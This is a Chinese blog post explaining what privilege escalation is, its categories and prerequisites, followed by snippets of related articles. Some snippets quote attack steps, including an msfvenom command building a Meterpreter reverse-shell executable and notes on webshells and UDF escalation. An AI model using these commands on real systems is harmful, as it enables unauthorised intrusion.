Web的基本漏洞--提权

最新推荐文章于 2025-04-15 13:40:24 发布
最新推荐文章于 2025-04-15 13:40:24 发布
阅读量715 收藏
点赞数
分类专栏: 信息安全 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62421736/article/details/130979150
版权
提权是指通过利用系统漏洞、数据库弱点或配置错误,从低权限账户升级到更高权限,如Windows的User到System,Linux的User到Root。提权方式包括系统漏洞、数据库、配置错误、权限继承、第三方软件和服务以及WebServer漏洞等,但需具备相应权限和漏洞条件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一、提权介绍

1.什么是提权

2.提权的分类

3.提权条件

一、提权介绍

1.什么是提权

提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。

Windows:User >> System
Linux:User >> Root

2.提权的分类

1、系统漏洞提权(Linux、Windows)

2、数据库提权

3、系统配置错误提权

4、权限继承类提权

5、第三方软件/服务提权

6、WebServer漏洞提权

3.提权条件

提权不是在任何条件下都可以进行,他需要一定的条件,例如拥有内网普通用户权限、拥有WebShell权限、拥有FTP权限、拥有某些远程管理软件的账号和密码等,同时在服务器上存在相应的漏洞。还需要有利于该漏洞的工具或者代码程序等。

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell等获取5个flag。本文将讲解DC-1和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[升] Windows — 系统内核溢出漏洞
Blue17 の 小窝
01-29 1183
注意:很容易让电脑蓝屏,所以如果是测试的话,前最好做好系统备份。溢出漏洞就像是往杯子里装水 —— 如果水太多,被子装不下了,就会溢出来。计算机中有个地方叫作缓存区。程序缓存区的大小是事先设置好的,如果用户输入数据的大小超过了缓存区的大小,程序就会溢出。系统内核溢出漏洞是一种通用的方法,攻击者通常可以使用该方法绕过系统的所有安全限制。攻击者利用该漏洞的关键是目标系统没有及时安装补丁—— 即使微软已经针对某个漏洞发布了补丁,但如果系统没有立即安装补丁,就会让攻击者有机可乘。
WEB安全--思路
m0_74800552的博客
04-04 369
在我们成功上传webshell到服务器中并拿到限时,发现我们的限很低无法执行特定的命令,这时为了能做更多的操作,我们就需要限。
【kali】29 —— 利用漏洞
(∪.∪ )...zzz的博客
11-27 8152
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe成功二、Win7 使用 Ms14-068 获取 域控制器的限1.win2003搭建域控制器2. 修改win2003域控制器的用户限三、利用 CVE-2012-0056 升 linux 限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 限 1. Ms0
Linux漏洞CVE-2025-27591,从零基础到精通,收藏这篇就够了!_linux cve
最新发布
yy1715713348的博客
04-15 822
各位攻城狮、程序猿们,今天咱们来聊点刺激的!Linux 漏洞 CVE-2025-27591,听说过没?没听过?没关系,今天就带你把它扒个精光!这个漏洞存在于 Below 服务(版本低于 v0.9.0),简单来说,就是因为这个目录太奔放了,限设置成了全局可写,导致任何阿猫阿狗都能往里塞东西。这就好比你家大门钥匙人手一把,想不进贼都难啊!
Web】超级详细的Linux升一站式笔记
uuzeray的博客
02-11 4120
SUID是一种特殊限,设置了suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的限设置,它就是设置了suid限的注意以下几点:1. 只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.2. 命令执行者要对该程序文件拥有执行(x)限.
[Web安全 网络安全]-、开发、对抗
刘鑫磊
10-31 788
、开发、对抗
(web安全)windows
weixin_44893706的博客
03-20 393
123。
WEB
forbidd3n,keep going
10-25 3536
本文转自《剑眉大侠笔记》,个人觉得思路想法很好,就转载了,其中蓝色字体为本人笔记 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 注:若net被禁用,可使用aio工具,可进行账户的克隆,该工具还有很多用户,请自行了解 2.当
web
qq_40495877的博客
04-29 2182
这里利用冰蝎远程连接到了靶机上: 利用systeminfo查看靶机系统的补丁; 如果有限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。 然后就利用本机下载的wesng去对比补丁库吧,命令如下: wesng目录下: python wes.py systeminfo.txt -o vuln.csv 对比结果保存为vuln.csv文件: 这里我们就有可利用的补丁漏洞了; 接下来用linux或者忍者系统去创建一个远程木马 命令行下: msfvenom -
【VulnHub系列】AI-Web-1 漏洞
初学者L_言的博客
07-12 783
一、环境 靶机: https://www.vulnhub.com/entry/ai-web-1,353/ 攻击机: kali 二、具体步骤 2.1 主机发现 nmap -sP ip段 2.2 端口服务扫描 nmap -sV -A -p- 192.168.47.152 Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd | http-robots.txt: 2 disal
Guest升方法总结
Another's story
07-31 2443
  现在的入侵是越来越难了,人们的安全意识都普遍高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。) 但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员限。比如我们通过某些对IIS的攻击,只
升第一天-简单Web升&转移
weixin_39953838的博客
12-26 681
你能成功,却不了你在她心里的位置。
漏洞利用与
09-20
ID tdcoming 的白帽子的演讲PPT,共43页。详细介绍了漏洞利用的各个步骤,值得一看
[升] Linux — 系统内核溢出漏洞
Blue17 の 小窝
02-05 1656
注意:很容易让系统崩溃,所以如果是测试的话,前最好做好系统备份。Linux 系统内核溢出漏洞与之前的Windows 内核溢出漏洞原理都差不多,都是通过内核漏洞进行的,内核漏洞一般都是专门研究这些的专家发现的,我们这些小卡拉米会用就行了(后面自学一下也未尝不可)。利用内核漏洞进行基本流程如下:对目标系统进行信息收集,获取到系统内核信息以及版本信息。根据内核版本获取其对应的漏洞以及 EXP。使用找到的 EXP 对目标系统发起攻击,完成操作。
Vulnhub-DC 7-9 、端口敲门
2301_80115097的博客
04-28 1228
Vulnhub是一个供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本);
Windows—数据库-mysql&mssql&Oracle数据库
网络空间安全学习
04-01 1521
Windows-数据库-MySQL-MSSQL-Oracle MySQL UDF、反弹shell、启动项、mof MSSQL系统函数-使用系统函数 Oracle 数据库 可使用Oracle shell工具进行操作
漏洞(Privilege Escalation Vulnerability)
qq_69100706的博客
04-20 892
漏洞(Privilege Escalation Vulnerability)是指在一个系统或应用程序中,攻击者能够通过某种方式获得比原本更低级别限更高的系统或应用程序访问限。这种漏洞通常存在于操作系统、应用程序或网络服务中,攻击者利用这类漏洞可以突破原有的限限制,执行未经授的操作,如读取、修改或删除关键系统文件,操控系统服务,甚至取得系统管理员限。
Metasploit利用ms15-051漏洞进行
04-01 3772
Metasploit利用ms15-051漏洞进行 实验环境 虚拟机:kali-linux(攻击机) 192.168.18.142 window server 2003(靶机) 192.168.18.146 工具:Metasploit 步骤: 1、生成木马文件: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.142 lport=4444 -f exe -o /root/shell.exe 2、服务器网站目录上创建个shell
PHP Shell (SPS-3.0): 2013年流行的PHP工具
后门通常指的是利用系统中的安全漏洞或配置缺陷来获取比当前登录用户更高的限。在Web应用程序中,如果攻击者能够在服务器上执行任意PHP代码,那么通过编写一个PHP Shell后门,攻击者就可以实现控制服务器的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值